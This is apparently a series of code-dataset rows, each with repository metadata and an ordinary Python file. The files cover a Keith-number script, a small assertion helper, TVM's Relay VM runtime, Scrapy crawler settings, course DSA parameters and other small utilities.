#print 'queue:', threading.current_thread()
print kn, " is a Keith Number!"
print "PROOF:"
n=map(int,str(kn))
while kn > sum(n):
print n ," = ", sum(n)
n=n[1:]+[sum(n)]
print n ," = ", sum(n)
#self.report_keith_num(number_to_test)
#print "new keith number reported!!!!"
print '---------------------------------------------'
print "press ENTER to continue"
########################################################################
if __name__=="__main__":
if len(sys.argv) > 1:
end_num = sys.argv[1]
nowtime = time.clock()
# get num to work from
start_num = 0
print "Starting number:", start_num
for x in xrange(start_num, int(end_num)):
is_repfibdigit2(x)
print
print "completion time:", abs(nowtime - time.clock())
print pgbreak
#raw_input()
| [
"[email protected]"
] | |
00db2c8c3ed972b7163d98736f55e12ede747a2c | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/577538_Poor_Man_unit_tests/recipe-577538.py | a085b12780b5428ff89dbdb43e8d9d754e602175 | [
"MIT"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 3,834 | py | #! /usr/bin/env python
######################################################################
# Written by Kevin L. Sitze on 2010-12-03
# This code may be used pursuant to the MIT License.
######################################################################
import sys
import traceback
from types import FloatType, ComplexType
__all__ = (
'assertEquals',
'assertNotEquals',
'assertException',
'assertFalse',
'assertNone',
'assertNotNone',
'assertSame',
'assertNotSame',
'assertTrue'
)
def colon( msg ):
if msg:
return ": " + str( msg )
else:
return ""
def assertEquals( exp, got, msg = None ):
"""assertEquals( exp, got[, message] )
Two objects test as "equal" if:
* they are the same object as tested by the 'is' operator.
* either object is a float or complex number and the absolute
value of the difference between the two is less than 1e-8.
* applying the equals operator ('==') returns True.
"""
if exp is got:
r = True
elif ( type( exp ) in ( FloatType, ComplexType ) or
type( got ) in ( FloatType, ComplexType ) ):
r = abs( exp - got ) < 1e-8
else:
r = ( exp == got )
if not r:
print >>sys.stderr, "Error: expected <%s> but got <%s>%s" % ( repr( exp ), repr( got ), colon( msg ) )
traceback.print_stack()
def assertNotEquals( exp, got, msg = None ):
"""assertNotEquals( exp, got[, message] )
Two objects test as "equal" if:
* they are the same object as tested by the 'is' operator.
* either object is a float or complex number and the absolute
value of the difference between the two is less than 1e-8.
* applying the equals operator ('==') returns True.
"""
if exp is got:
r = False
elif ( type( exp ) in ( FloatType, ComplexType ) or
type( got ) in ( FloatType, ComplexType ) ):
r = abs( exp - got ) >= 1e-8
else:
r = ( exp != got )
if not r:
print >>sys.stderr, "Error: expected different values but both are equal to <%s>%s" % ( repr( exp ), colon( msg ) )
traceback.print_stack()
def assertException( exceptionType, f, msg = None ):
"""Assert that an exception of type \var{exceptionType}
is thrown when the function \var{f} is evaluated.
"""
try:
f()
except exceptionType:
assert True
else:
print >>sys.stderr, "Error: expected <%s> to be thrown by function%s" % ( exceptionType.__name__, colon( msg ) )
traceback.print_stack()
def assertFalse( b, msg = None ):
"""assertFalse( b[, message] )
"""
if b:
print >>sys.stderr, "Error: expected value to be False%s" % colon( msg )
traceback.print_stack()
def assertNone( x, msg = None ):
assertSame( None, x, msg )
def assertNotNone( x, msg = None ):
assertNotSame( None, x, msg )
def assertSame( exp, got, msg = None ):
if got is not exp:
print >>sys.stderr, "Error: expected <%s> to be the same object as <%s>%s" % ( repr( exp ), repr( got ), colon( msg ) )
traceback.print_stack()
def assertNotSame( exp, got, msg = None ):
if got is exp:
print >>sys.stderr, "Error: expected two distinct objects but both are the same object <%s>%s" % ( repr( exp ), colon( msg ) )
traceback.print_stack()
def assertTrue( b, msg = None ):
if not b:
print >>sys.stderr, "Error: expected value to be True%s" % colon( msg )
traceback.print_stack()
if __name__ == "__main__":
assertNone( None )
assertEquals( 5, 5 )
assertException( KeyError, lambda: {}['test'] )
assertNone( 5, 'this assertion is expected' )
assertEquals( 5, 6, 'this assertion is expected' )
assertException( KeyError, lambda: {}, 'this assertion is expected' )
| [
"[email protected]"
] | |
294780ff7ab60dc91677fc1d89295b77c146b850 | 4a53aba78d55247e185d8cef5e2a1f8892ae68be | /learn_python/08.jpype.py | 13917ac8e31a1518b4553ebf02a516bd1b6ee5af | [] | no_license | axu4github/Learn | 665bb8ddd2eb420a0e7bc3d1ff68f66958936645 | 2eb33b5a97f1730e3f774b80e3b206c49faa2228 | refs/heads/master | 2023-01-22T15:49:53.260777 | 2018-10-25T15:21:56 | 2018-10-25T15:21:56 | 61,703,577 | 1 | 0 | null | 2023-01-12T08:23:28 | 2016-06-22T08:46:46 | JavaScript | UTF-8 | Python | false | false | 664 | py | # encoding=utf-8
'''
Mac安装JPype
1. 下载 https://sourceforge.net/projects/jpype/ 最新版本
2. 解压,进入目录
3. 执行 sudo python setup.py install
若存在 `error: command 'clang' failed with exit status 1` 的问题
则需要在 setup.py 文件的 `self.includeDirs` 中添加 `"/System/Library/Frameworks/JavaVM.framework/Versions/A/Headers/"` 以便可以找到 `jni.h` 等头文件。
具体可详见:http://blog.csdn.net/jerrychenly/article/details/20545995 说明
'''
from jpype import *
startJVM('/Library/Java/JavaVirtualMachines/jdk1.7.0_09.jdk/Contents/MacOS/libjli.dylib')
java.lang.System.out.println("hello world")
shutdownJVM()
| [
"[email protected]"
] | |
8c817d375a6e4429ab2667c176887dbb4d65c7da | a499fbdd93f85a286505433a08afc25d84c8ff04 | /python/tvm/runtime/vm.py | 2be3f3ec1a78cdc5de989fd61d84de1855339132 | [
"Apache-2.0",
"Zlib",
"MIT",
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense"
] | permissive | elphinkuo/tvm | a81e0ccc5950a1473efdcdbb8263de9adbe36787 | 9df2ae8eaa8b394013182a7ad09ac57fe401f80e | refs/heads/main | 2023-08-05T07:41:18.652097 | 2021-09-28T00:38:26 | 2021-09-28T00:38:26 | 411,311,927 | 2 | 0 | Apache-2.0 | 2021-09-28T14:51:56 | 2021-09-28T14:17:46 | null | UTF-8 | Python | false | false | 21,091 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=no-else-return, unidiomatic-typecheck, undefined-variable, invalid-name, redefined-builtin
"""
The Relay Virtual Machine runtime.
Implements a Python interface to executing the compiled VM object.
"""
import numpy as np
import tvm
from tvm.runtime import Module
from tvm._ffi.runtime_ctypes import TVMByteArray
from tvm._ffi import base as _base
from .object import Object
from . import _ffi_api, container
from ..rpc.base import RPC_SESS_MASK
def _convert(arg, cargs):
if isinstance(arg, Object):
cargs.append(arg)
elif isinstance(arg, np.ndarray):
nd_arr = tvm.nd.array(arg, device=tvm.cpu(0))
cargs.append(nd_arr)
elif isinstance(arg, tvm.runtime.NDArray):
cargs.append(arg)
elif isinstance(arg, (tuple, list)):
field_args = []
for field in arg:
_convert(field, field_args)
cargs.append(container.tuple_object(field_args))
elif isinstance(arg, (_base.numeric_types, bool)):
dtype = "int32" if isinstance(arg, (_base.integer_types, bool)) else "float32"
value = tvm.nd.array(np.array(arg, dtype=dtype), device=tvm.cpu(0))
cargs.append(value)
elif isinstance(arg, str):
cargs.append(arg)
else:
raise TypeError("Unsupported type: %s" % (type(arg)))
def convert(args):
cargs = []
for arg in args:
_convert(arg, cargs)
return cargs
class Executable(object):
"""Relay VM executable"""
def __init__(self, mod):
self.mod = mod
self._function_params = {}
self._save = self.mod["save"]
self._get_lib = self.mod["get_lib"]
self._get_bytecode = self.mod["get_bytecode"]
self._get_stats = self.mod["get_stats"]
self._get_function_arity = self.mod["get_function_arity"]
self._get_function_param_name = self.mod["get_function_param_name"]
def save(self):
"""Save the Relay VM Executable.
Returns
-------
code : bytearray
The binary blob representing a serialized Relay VM executable. It
can then be saved to disk and later deserialized into a new
Executable.
lib : :py:class:`~tvm.runtime.Module`
The runtime module that contains the generated code. It is
basically a library that is composed of hardware dependent code.
Notes
-----
The returned code is organized with the following sections in order.
- Global section. This section contains the globals used by the
virtual machine.
- Constant section. This section is used to store the constant pool of
a virtual machine.
- Primitive name section. This section is introduced to accommodate
the list of primitive operator names that will be invoked by the
virtual machine.
- Code section. The VM functions, including bytecode, are sitting in
this section.
Examples
--------
.. code-block:: python
import numpy as np
import tvm
from tvm import te
from tvm import relay
# define a simple network.
x = relay.var('x', shape=(10, 10))
f = relay.Function([x], x + x)
mod = tvm.IRModule({"main": f})
# create a Relay VM.
dev = tvm.cpu()
target = "llvm"
executable = relay.vm.compile(mod, target)
code, lib = executable.save()
# save and load the code and lib file.
tmp = tvm.contrib.utils.tempdir()
path_lib = tmp.relpath("lib.so")
lib.export_library(path_lib)
with open(tmp.relpath("code.ro"), "wb") as fo:
fo.write(code)
loaded_lib = tvm.runtime.load_module(path_lib)
loaded_code = bytearray(open(tmp.relpath("code.ro"), "rb").read())
# deserialize.
des_exec = tvm.runtime.vm.Executable.load_exec(loaded_code, loaded_lib)
# execute the deserialized executable.
x_data = np.random.rand(10, 10).astype('float32')
des_vm = tvm.runtime.vm.VirtualMachine(des_exec, dev)
res = des_vm.run(x_data)
print(res.numpy())
"""
return self._save(), self._get_lib()
@staticmethod
def load_exec(bytecode, lib):
"""Construct an executable from saved artifacts.
Parameters
----------
bytecode : bytearray
The binary blob representing a the Relay VM bytecode.
lib : :py:class:`~tvm.runtime.Module`
The runtime module that contains the generated code.
Returns
-------
exec: Executable
An executable constructed using the provided artifacts.
"""
if isinstance(bytecode, (bytes, str)):
code = bytearray(bytecode)
elif not isinstance(bytecode, (bytearray, TVMByteArray)):
raise TypeError(
"bytecode is expected to be the type of bytearray "
+ "or TVMByteArray, but received {}".format(type(code))
)
if lib is not None and not isinstance(lib, tvm.runtime.Module):
raise TypeError(
"lib is expected to be the type of tvm.runtime.Module"
+ ", but received {}".format(type(lib))
)
return Executable(_ffi_api.Load_Executable(bytecode, lib))
@property
def lib(self):
"""Get the library that contains hardware dependent code.
Returns
-------
ret : :py:class:`~tvm.runtime.Module`
The runtime module that contains hardware dependent code.
"""
return self._get_lib()
@property
def stats(self):
"""Get the statistics of the Relay VM executable.
Returns
-------
ret : String
The statistic information of the VM executable.
"""
return self._get_stats()
@property
def primitive_ops(self):
"""Get the name of the primitive ops contained in the executable.
Returns
-------
ret : List[String]
The list of primitive ops.
"""
ret = []
num_primitives = _ffi_api.GetNumOfPrimitives(self.module)
for i in range(num_primitives):
ret.append(_ffi_api.GetPrimitiveFields(self.module, i))
return ret
@property
def bytecode(self):
"""Get the bytecode of the Relay VM executable.
Returns
-------
ret : String
The bytecode of the executable.
Notes
-----
The bytecode is in the following format:
func_name reg_file_size num_instructions
param1 param2 ... paramM
instruction1
instruction2
...
instructionN
Each instruction is printed in the following format:
hash opcode field1 ... fieldX # The text format.
The part starting from # is only used for visualization and debugging.
The real serialized code doesn't contain it, therefore the deserializer
doesn't need to deal with it as well.
"""
return self._get_bytecode()
@property
def globals(self):
"""Get the globals used by the Relay VM executable.
Returns
-------
ret : List[String]
The globals contained in the executable.
"""
ret = []
num_globals = _ffi_api.GetNumOfGlobals(self.module)
for i in range(num_globals):
ret.append(_ffi_api.GetGlobalFields(self.module, i))
return ret
@property
def module(self):
"""Return the runtime module contained in a virtual machine executable."""
return self.mod
def get_function_params(self, func_name):
"""Get VM Function parameters"""
if func_name in self._function_params:
return self._function_params[func_name]
arity = self._get_function_arity(func_name)
assert arity >= 0
params = []
for i in range(arity):
p = self._get_function_param_name(func_name, i)
assert p
params.append(p)
self._function_params[func_name] = params
return params
class VirtualMachine(object):
"""Relay VM runtime.
Parameters
----------
exe : Executable
The VM executable.
device : tvm.runtime.Device or List[tvm.runtime.Device]
The device to deploy the module
memory_cfg : str or Dict[tvm.runtime.Device, str], optional
Config the type of memory allocator. The allocator type can be ["naive",
"pooled"]. If memory_cfg is None, all devices will use pooled allocator
by default. If memory_cfg is string, all devices will use the specified
allocator type. If memory_cfg is a dict, each device uses the allocator
type specified in the dict, or pooled allocator if not specified in the
dict.
"""
NAIVE_ALLOCATOR = 1
POOLED_ALLOCATOR = 2
def __init__(self, exe, device, memory_cfg=None):
"""
Construct a VirtualMachine wrapper class which provides a simple
interface over the raw C++ Module based API.
Parameters
----------
exe: Union[Executable, Module]
The executable either with the wrapper Python type or the raw runtime.Module.
In most cases this will be the Python wrapper class tvm.runtime.vm.Executable but
if you instead get the underlying runtime.Module subclass (i.e `exe.mod`) you
can directly pass it to this method.
This case can occur when doing things such as RPC where TVM's module APIs
return the raw modules, not the wrapped modules. This constructor will
handle this internally.
device: Union[Device, List[Device]]
The device, or devices on which to execute the VM code.
memory_cfg: Optional[str]
The allocator behavior to use for the VM.
Returns
-------
vm: VirtualMachine
A VM wrapper object.
"""
if not isinstance(exe, Executable) and not isinstance(exe, Module):
raise TypeError(
"exe is expected to be the type of Executable, "
+ "but received {}".format(type(exe))
)
if not isinstance(exe, Executable):
exe = Executable(exe)
self.module = exe.mod["vm_load_executable"]()
self._exec = exe
self._init = self.module["init"]
self._invoke = self.module["invoke"]
self._invoke_stateful = self.module["invoke_stateful"]
self._get_output = self.module["get_output"]
self._get_num_outputs = self.module["get_num_outputs"]
self._get_input_index = self.module["get_input_index"]
self._set_input = self.module["set_input"]
self._setup_device(device, memory_cfg)
def _setup_device(self, dev, memory_cfg):
"""Init devices and allocators."""
devs = dev
if not isinstance(dev, (list, tuple)):
if not isinstance(dev, tvm.runtime.Device):
raise TypeError(
"dev is expected to be Device or \
List[Device]"
)
devs = [dev]
# CPU is required for executing shape functions
if not any(c.device_type % RPC_SESS_MASK == tvm.cpu().device_type for c in devs):
devs.append(tvm.cpu())
default_alloc_type = VirtualMachine.POOLED_ALLOCATOR
if memory_cfg is None:
memory_cfg = {}
elif isinstance(memory_cfg, str):
assert memory_cfg in ["naive", "pooled"]
if memory_cfg == "naive":
default_alloc_type = VirtualMachine.NAIVE_ALLOCATOR
memory_cfg = {}
elif not isinstance(memory_cfg, dict):
raise TypeError(
"memory_cfg is expected be string or dictionary, "
+ "but received {}".format(type(memory_cfg))
)
init_args = []
for device in devs:
init_args.append(device.device_type % RPC_SESS_MASK)
init_args.append(device.device_id)
alloc_type = memory_cfg[device] if device in memory_cfg else default_alloc_type
init_args.append(alloc_type)
self._init(*init_args)
def set_input(self, func_name, *args, **kwargs):
"""Set the input to a function.
Parameters
----------
func_name : str
The name of the function.
args : list[tvm.runtime.NDArray] or list[np.ndarray]
The arguments to the function.
kwargs: dict of str to tvm.runtime.NDArray or np.ndarray
Named arguments to the function.
"""
if kwargs:
# kwargs is a super set of the required function parameters. We
# only find the ones that are needed.
func_params = self._exec.get_function_params(func_name)
new_args = [None] * len(func_params)
cnt = 0
for k in kwargs:
if k in func_params:
idx = func_params.index(k)
new_args[idx] = kwargs[k]
cnt += 1
assert len(args) + cnt == len(func_params)
idx = 0
for i, arg in enumerate(new_args):
if arg is None:
new_args[i] = args[idx]
idx += 1
args = new_args
cargs = convert(args)
self._set_input(func_name, *cargs)
def invoke(self, func_name, *args, **kwargs):
"""Invoke a function.
Parameters
----------
func_name : str
The name of the function.
args : list[tvm.runtime.NDArray] or list[np.ndarray]
The arguments to the function.
kwargs: dict of str to tvm.runtime.NDArray or np.ndarray
Named arguments to the function.
Returns
-------
result : Object
The output.
"""
if args or kwargs:
self.set_input(func_name, *args, **kwargs)
return self._invoke(func_name)
def run(self, *args, **kwargs):
"""Run the main function.
Parameters
----------
args : list[tvm.runtime.NDArray] or list[np.ndarray]
The arguments to the function.
kwargs: dict of str to tvm.runtime.NDArray or np.ndarray
Named arguments to the function.
Returns
-------
result : Object
The output.
"""
return self.invoke("main", *args, **kwargs)
def invoke_stateful(self, func_name, *args, **kwargs):
"""Invoke a function and ignore the returned result.
Use this function when running over rpc because it is currently
impossible to return a ADT object over rpc. To get the outputs, use
:py:func`get_outputs`.
Parameters
----------
func_name : str
The name of the function.
args : list[tvm.runtime.NDArray] or list[np.ndarray]
The arguments to the function.
kwargs: dict of str to tvm.runtime.NDArray or np.ndarray
Named arguments to the function.
"""
if args or kwargs:
self.set_input(func_name, *args, **kwargs)
self._invoke_stateful(func_name)
def get_outputs(self):
"""Get the outputs from a call to :py:func`invoke_stateful`.
Returns
-------
outputs : List[NDArray]
"""
return [self._get_output(i) for i in range(self._get_num_outputs())]
def get_input_index(self, input_name, func_name="main"):
"""Get inputs index via input name.
Parameters
----------
name : str
The input key name
func_name : str
The function name
Returns
-------
index: int
The input index. -1 will be returned if the given input name is not found.
"""
return self._get_input_index(input_name, func_name)
def benchmark(
self,
device,
*args,
func_name="main",
repeat=5,
number=5,
min_repeat_ms=None,
end_to_end=False,
**kwargs,
):
"""Calculate runtime of a function by repeatedly calling it.
Use this function to get an accurate measurement of the runtime of a function. The function
is run multiple times in order to account for variability in measurements, processor speed
or other external factors. Mean, median, standard deviation, min and max runtime are all
reported. On GPUs, CUDA and ROCm specifically, special on-device timers are used so that
synchonization and data transfer operations are not counted towards the runtime. This allows
for fair comparison of runtimes across different functions and models. The `end_to_end` flag
switches this behavior to include data transfer operations in the runtime.
The benchmarking loop looks approximately like so:
.. code-block:: python
for r in range(repeat):
time_start = now()
for n in range(number):
func_name()
time_end = now()
total_times.append((time_end - time_start)/number)
Parameters
----------
func_name : str
The function to benchmark
repeat : int
Number of times to run the outer loop of the timing code (see above). The output will
contain `repeat` number of datapoints.
number : int
Number of times to run the inner loop of the timing code. This inner loop is run in
between the timer starting and stopping. In order to amortize any timing overhead,
`number` should be increased when the runtime of the function is small (less than a 1/10
of a millisecond).
min_repeat_ms : Optional[float]
If set, the inner loop will be run until it takes longer than `min_repeat_ms`
milliseconds. This can be used to ensure that the function is run enough to get an
accurate measurement.
end_to_end : bool
If set, include time to transfer input tensors to the device and time to transfer
returned tensors in the total runtime. This will give accurate timings for end to end
workloads.
args : Sequence[Object]
Arguments to the function. These are cached before running timing code, so that data
transfer costs are not counted in the runtime.
kwargs : Dict[str, Object]
Named arguments to the function. These are cached like `args`.
Returns
-------
timing_results : BenchmarkResult
Runtimes of the function. Use `.mean` to access the mean runtime, use `.results` to
access the individual runtimes (in seconds).
"""
min_repeat_ms = 0 if min_repeat_ms is None else min_repeat_ms
if end_to_end:
# We need to unpack keyword arguments into positional arguments
packed_args = list(args)
for k, v in kwargs.items():
i = self.get_input_index(k, func_name)
if i < 0:
raise TypeError(f"{func_name}() got an unexpected keyword argument '{k}'")
while i >= len(packed_args):
packed_args.append(None)
packed_args[i] = v
return self.module.time_evaluator(
"invoke_return_to_device",
device,
repeat=repeat,
number=number,
min_repeat_ms=min_repeat_ms,
)(func_name, device.device_type, device.device_id, *packed_args)
if args or kwargs:
self.set_input(func_name, *args, **kwargs)
return self.module.time_evaluator(
"invoke", device, repeat=repeat, number=number, min_repeat_ms=min_repeat_ms
)(func_name)
| [
"[email protected]"
] | |
b00ab8ba872307d2333753f04e741547c90f2cd0 | 2793721e5cbfccfedac75556e34dba22999530d7 | /Data_Structures/Queue/venv/bin/easy_install-3.7 | 8f39f903e7eb3bb8428554ff85aff955f127983f | [] | no_license | iafjayoza/Python | 135e613d1d23c493b05a009843b40cbca6a1d318 | aaa05b0d655c8f0a47ced0100a844d99f852b2a4 | refs/heads/master | 2022-12-07T07:21:46.494885 | 2020-09-06T09:03:27 | 2020-09-06T09:03:27 | 282,707,082 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | 7 | #!/Users/jo049566/Desktop/Jay/Jay_Data/Study_Repo/Python/Projects/Queue/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"[email protected]"
] | |
746b0c743ffb8d49b2ff71cf870102d7d7279481 | 5cea76d53779d466f19a5cf0b51e003586cc4a7b | /py4ops/getip.py | e2bbe141b3b44d2c61828b6bf996715b6e854f17 | [] | no_license | evan886/python | 40152fdb4885876189580141abe27a983d04e04d | d33e996e93275f6b347ecc2d30f8efe05accd10c | refs/heads/master | 2021-06-28T12:35:10.793186 | 2021-05-26T14:33:40 | 2021-05-26T14:33:40 | 85,560,342 | 2 | 1 | null | 2017-10-11T05:31:06 | 2017-03-20T09:51:50 | JavaScript | UTF-8 | Python | false | false | 599 | py | #!/usr/bin/python
#-*- coding:utf-8 -*-
import socket
import fcntl
import struct
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
print get_ip_address('eth0')
'''
send email 要用到这个ip 的东西
>>> get_ip_address('eth0')
'38.113.228.130'
http://blog.csdn.net/heizistudio/article/details/38413739
使用Python获得本机IP地址
http://www.pythonclub.org/python-network-application/get-ip-address
''' | [
"[email protected]"
] | |
be3cab903221403283dcb433087d1d2770b819c1 | 2aec9c5e8c72b731d3abf22f2a407fe09c1cde09 | /SipopPolicyImg/SipopPolicyImg/settings.py | dc0ee7131688caeaf0e766dc8fe3b44d9a87787e | [] | no_license | jiangyg/ZWFproject | 8b24cc34970ae0a9c2a2b0039dc527c83a5862b5 | aa35bc59566d92721f23d2dd00b0febd268ac2dd | refs/heads/master | 2020-09-26T17:01:00.229380 | 2019-11-15T13:16:21 | 2019-11-15T13:16:21 | 226,297,631 | 0 | 1 | null | 2019-12-06T09:55:37 | 2019-12-06T09:55:36 | null | UTF-8 | Python | false | false | 2,169 | py | # Scrapy settings for SipopPolicyImg project
#
# For simplicity, this file contains only the most important settings by
# default. All the other settings are documented here:
#
# http://doc.scrapy.org/topics/settings.html
#
SPIDER_MODULES = ['SipopPolicyImg.spiders']
NEWSPIDER_MODULE = 'SipopPolicyImg.spiders'
ROBOTSTXT_OBEY = False
# USER_AGENT = 'scrapy-redis (+https://github.com/rolando/scrapy-redis)'
DUPEFILTER_CLASS = "scrapy_redis.dupefilter.RFPDupeFilter"
SCHEDULER = "scrapy_redis.scheduler.Scheduler"
SCHEDULER_PERSIST = True
SCHEDULER_QUEUE_CLASS = "scrapy_redis.queue.SpiderPriorityQueue"
#SCHEDULER_QUEUE_CLASS = "scrapy_redis.queue.SpiderQueue"
#SCHEDULER_QUEUE_CLASS = "scrapy_redis.queue.SpiderStack"
ITEM_PIPELINES = {
'SipopPolicyImg.pipelines.SipoppolicyPipeline': 300,
'scrapy_redis.pipelines.RedisPipeline': 400,
}
LOG_LEVEL = 'DEBUG'
DOWNLOADER_MIDDLEWARES = {
'SipopPolicyImg.middlewares.RandMiddleware': 543,
'scrapy.contrib.downloadermiddleware.useragent.UserAgentMiddleware': None,
}
REDIS_HOST = '127.0.0.1' # 也可以根据情况改成 localhost
REDIS_PORT = 6379
REDIS_PARAMS = {
'db': 15,
}
# Introduce an artifical delay to make use of parallelism. to speed up the
# crawl.
DOWNLOAD_DELAY = 1
CONCURRENT_REQUESTS = 8
RETRY_ENABLED = True # 重试中间件 指定关闭 默认为 True 是开启状态
RETRY_HTTP_CODES = [302] # 指定要重试的 HTTP 状态码,其它错误会被丢弃
RETRY_TIMES = 10 # 指定重试次数
AUTOTHROTTLE_ENABLED = True # 自动限速扩展
AUTOTHROTTLE_START_DELAY = 5.0
# 最初的下载延迟(以秒为单位)
AUTOTHROTTLE_MAX_DELAY = 60.0
# 在高延迟情况下设置的最大下载延迟(以秒为单位)
AUTOTHROTTLE_DEBUG = True
# 启用 AutoThrottle 调试模式,该模式显示收到的每个响应的统计数据,以便可以实时调节参数
AUTOTHROTTLE_TARGET_CONCURRENCY = 10
# Scrapy 应平行发送到远程网站的请求数量 将此选项设置为更高的值以增加吞吐量和远程服务器上的负载 将此选项设置为更低的值以使爬虫更保守和礼貌
HTTPERROR_ALLOWED_CODES = [302, 500, 502, 404, 403, 503]
| [
"[email protected]"
] | |
3aafacd2c3e9f63889114636ae310d1c6ca37f74 | f7d343efc7b48818cac4cf9b98423b77345a0067 | /training/rotateArray.py | e9806b40cb7999c3ceb19bcba0f938c7c66662d9 | [] | no_license | vijaymaddukuri/python_repo | 70e0e24d0554c9fac50c5bdd85da3e15c6f64e65 | 93dd6d14ae4b0856aa7c6f059904cc1f13800e5f | refs/heads/master | 2023-06-06T02:55:10.393125 | 2021-06-25T16:41:52 | 2021-06-25T16:41:52 | 151,547,280 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | n=[1,2,3,4,5,6,7]
k=3
def rotateArray(n, k):
new=n[k:]+n[:k]
return new
newArray=rotateArray(n,k)
print(newArray) | [
"[email protected]"
] | |
09b541231ca7b26b86b963b1d56d20ded60d96a8 | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/artificial/transf_Anscombe/trend_ConstantTrend/cycle_12/ar_/test_artificial_128_Anscombe_ConstantTrend_12__100.py | 90590116d599656197e31e656d41ca810bd1f95f | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 269 | py | import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "ConstantTrend", cycle_length = 12, transform = "Anscombe", sigma = 0.0, exog_count = 100, ar_order = 0); | [
"[email protected]"
] | |
62476df0b7f7d2e336afdd3147f644b538346cf3 | 6e9c127bd6705a8b92f240ca663163504b86cd81 | /elecsim/reinforcement_learning/__init__.py | c81092b6f862e68895065cc1c34baacd81f097c9 | [
"MIT"
] | permissive | alexanderkell/elecsim | 239ffd539d1b04f24186ddaae20ac4ce6b258c03 | df9ea14cbc8dd3fd4302be9274cb6ea61c0cdb10 | refs/heads/master | 2023-04-06T10:03:35.367411 | 2023-04-05T16:52:16 | 2023-04-05T16:52:16 | 124,561,430 | 36 | 10 | MIT | 2022-12-08T01:57:45 | 2018-03-09T15:55:53 | Jupyter Notebook | UTF-8 | Python | false | false | 229 | py | """
File name: __init__.py
Date created: 01/03/2019
Feature: #Enter feature description here
"""
__author__ = "Alexander Kell"
__copyright__ = "Copyright 2018, Alexander Kell"
__license__ = "MIT"
__email__ = "[email protected]"
| [
"[email protected]"
] | |
53de0dc2fc3ca23f7489ba815b0d47e166c0a41d | 54a0b86d4c3f731487ad4470fb365907970472e6 | /P1/studentparameters/Project1_Parameters_gg.py | 84f2505c0e7969acde0d86286867f8a7f41dcddc | [] | no_license | samiurrahman98/ece458-computer-security | 26aa46e174b0bf77f748e6451dd2e0e4183feebd | cf79430b98e3679ffcd687a0c96b5e979187e1e3 | refs/heads/master | 2022-11-25T01:26:36.874094 | 2020-07-31T21:24:53 | 2020-07-31T21:24:53 | 280,979,038 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,771 | py | # Select the file name that matches your first two letters of your last name on Learn
# Read those parameters as your ECE458 project 1 parameters
# p,q,g are DSA domain parameters, sk_i (secret keys) are used in each signature and verification
p=16158504202402426253991131950366800551482053399193655122805051657629706040252641329369229425927219006956473742476903978788728372679662561267749592756478584653187379668070077471640233053267867940899762269855538496229272646267260199331950754561826958115323964167572312112683234368745583189888499363692808195228055638616335542328241242316003188491076953028978519064222347878724668323621195651283341378845128401263313070932229612943555693076384094095923209888318983438374236756194589851339672873194326246553955090805398391550192769994438594243178242766618883803256121122147083299821412091095166213991439958926015606973543
q=13479974306915323548855049186344013292925286365246579443817723220231
g=9891663101749060596110525648800442312262047621700008710332290803354419734415239400374092972505760368555033978883727090878798786527869106102125568674515087767296064898813563305491697474743999164538645162593480340614583420272697669459439956057957775664653137969485217890077966731174553543597150973233536157598924038645446910353512441488171918287556367865699357854285249284142568915079933750257270947667792192723621634761458070065748588907955333315440434095504696037685941392628366404344728480845324408489345349308782555446303365930909965625721154544418491662738796491732039598162639642305389549083822675597763407558360
sk1=4238046188863111196134523391567180673009409153722853144581286972290
sk2=5251810960028969703460342961462449674500434928936370393443116963182
sk3=1290595980181313010068948362172310388515606811911036234145294356283
| [
"[email protected]"
] | |
2b8a2244e4e8b8f8a97d5cbe7d0d579cd8508d15 | bc1525a4e85e49829ccbf7cfc9db6881790fa3a7 | /pyUbiForge/ACU/type_readers/788BAA0D.py | cf65a21e511965a7960ee2750c94202ea6eb269d | [] | no_license | christianbethel1993/ACExplorer | 5183228c1c1beb5d7a3c768f5c8345e00e38f82f | f343de8925e0ca08aff7d2719c5e885dc3e503ac | refs/heads/master | 2023-03-26T13:57:15.390140 | 2019-07-02T12:05:23 | 2019-07-02T12:05:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | from pyUbiForge.misc.file_object import FileObjectDataWrapper
